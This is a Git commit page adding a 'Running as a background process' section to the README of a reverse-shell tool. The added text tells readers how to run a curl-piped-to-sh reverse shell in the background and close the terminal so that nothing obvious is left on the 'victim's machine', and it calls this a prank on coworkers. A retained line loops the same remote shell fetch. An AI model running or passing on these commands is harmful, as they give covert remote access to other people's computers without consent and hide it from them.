Browse Source

Add background process tip

pull/20/head
Luke Childs 6 years ago
committed by GitHub
parent
commit
db78132593
No known key found for this signature in database GPG Key ID: 4AEE18F83AFDEB23
  1. 12
      README.md

12
README.md

@ -67,6 +67,18 @@ while true; do curl https://shell.now.sh/yourip:1337 | sh; done
Be careful if you do this to a coworker, if they leave the office with this still running you're opening them up to attack.
### Running as a background process
You'll need to leave the terminal session open to keep the reverse shell process running. Tat might be a bit of a giveaway if you're trying to praknk coworkers.
The following command will run the reverse shell in a background process and exit the terminal leaving nothing obvious on the victim's machine.
Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
```shell
sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit
```
## License
MIT © Luke Childs

Loading…
Cancel
Save